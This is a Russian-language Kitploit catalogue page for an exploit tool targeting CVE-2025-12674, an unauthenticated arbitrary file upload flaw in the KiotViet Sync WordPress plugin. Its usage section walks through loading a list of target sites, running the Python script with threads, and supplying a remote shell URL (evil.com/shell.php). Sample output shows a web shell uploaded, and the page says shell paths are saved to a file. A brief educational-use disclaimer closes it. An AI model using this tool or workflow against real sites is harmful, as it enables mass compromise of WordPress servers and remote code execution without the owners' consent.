Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - Неавторизованная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-12674
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Неавторизованная произвольная загрузка файлов

Репозиторий
218 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-12674

KiotViet Sync <= 1.8.5 - Неаутентифицированная произвольная загрузка файлов

🐚 KiotViet Sync <= 1.8.5 - Неаутентифицированная произвольная загрузка файлов


📝 Описание

Плагин KiotViet Sync для WordPress (версии до 1.8.5 включительно) уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов в функции create_media().
Эта уязвимость позволяет неаутентифицированным атакующим загружать произвольные файлы на сервер, что может привести к удаленному выполнению кода.

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (Критический)

🚀 Использование

  1. Клонируйте этот репозиторий или скачайте скрипт.

  2. Подготовьте цели:
    Поместите одну цель на строку в файл с именем list.txt.

root@kitploit:~
example.com
site2.com
http://site3.com
  • Запустите скрипт эксплойта:
    Имя скрипта:

    root@kitploit:~
    CVE-2025-12674.py
    
    root@kitploit:~
    python3 CVE-2025-12674.py
    
  • При появлении запроса введите ваши параметры:

    root@kitploit:~
    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
    • Каталог вывода для загруженной оболочки не показывает имя файла (так как оно генерируется динамически).

    📂 Вывод

    • Все пути успешно загруженных оболочек сохраняются в shells.txt.
    • Резервные копии вывода автоматически создаются с временными метками.

    ⚠️ Отказ от ответственности

    Этот скрипт предоставляется только для образовательных целей и авторизованного тестирования безопасности.
    Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
    Автор не несет ответственности за неправильное использование или любой причиненный ущерб.


    👤 Автор

    Nxploited (Khaled Alenazi)

    Скачать инструмент